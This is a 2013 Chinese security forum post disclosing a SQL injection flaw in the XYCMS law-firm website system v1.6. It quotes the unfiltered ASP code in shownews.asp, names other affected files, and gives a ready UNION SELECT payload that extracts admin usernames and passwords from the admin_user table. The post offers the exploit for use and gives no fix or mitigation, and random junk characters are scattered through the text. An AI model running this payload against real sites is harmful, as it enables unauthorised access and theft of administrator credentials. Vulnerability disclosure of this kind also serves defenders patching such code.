找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2164|回复: 0
打印 上一主题 下一主题

XYCMS律师事务所建站系统注入漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-4 17:28:12 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似( N9 l+ A! o7 v0 U) _
0 ?. b) @  Q6 x1 [- K7 g
淫荡分割线
0 Y# \* x- y/ I5 g  @--------------------------------------------------------* j8 n1 z* O5 g6 }" F) A
+ A' `& C6 l& i4 H$ x. U+ B- S
审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)5 t" N# W& x4 |( U% J, C7 W
源码地址:http://down.chinaz.com/soft/29233.htm
( K! D  c) v4 |8 A' F' g4 [" r& i+ e  r 0 M6 h, A; c% ]; N) _* h
漏洞文件:shownews.asp) Z5 |: e% h$ r
漏洞代码:7-13行
1 D, h1 C: R: K" S; z6 @6 h3 P 2 s9 C* I* J, r0 F4 g
$ k: C% w. G( k  c: \1 v& _
<% 2 \; f8 o% ]- a' P2 P7 B
id=request.QueryString("id")/ m/ ?1 M( l$ s; X
   
5 W9 c+ x9 s: F" Uset snews=server.createobject("adodb.recordset") 5 \/ \1 v7 d3 Z0 \: R  H; t* g& b
exec="select * from [news] where id="&id
2 C+ n9 J, Z6 ?' Q/ h& M  j* D! _snews.open exec,conn,1,1; n- U) b0 M2 X' w$ y0 s
%>
  k. u) x; p* L4 p6 b
, Z* S  j6 X1 W1 z$ z
( X1 s: E& \/ P! h8 U什么过滤都没有  直造成注入4 ^, l, N7 S+ v. ]% }

( k9 U1 Z+ n) ]" ~  L注入点:http://127.0.0.1:99/shownews.asp?id=xx! K2 k4 O1 x" y7 g) J' G2 r

$ t* l% i3 C$ O. n8 o其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找4 ?: n3 t+ X" J! F1 g5 M/ s
7 R( o8 T# ]. G) ~
) C. m( y/ _3 d0 J4 C- j, s8 ]: k
exp: union select 1,admin,password,4,5,7 from admin_user2 n* W3 Z( L; D; o9 g/ F
( T  Y" d6 Q) w: J3 \: v) H4 z
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表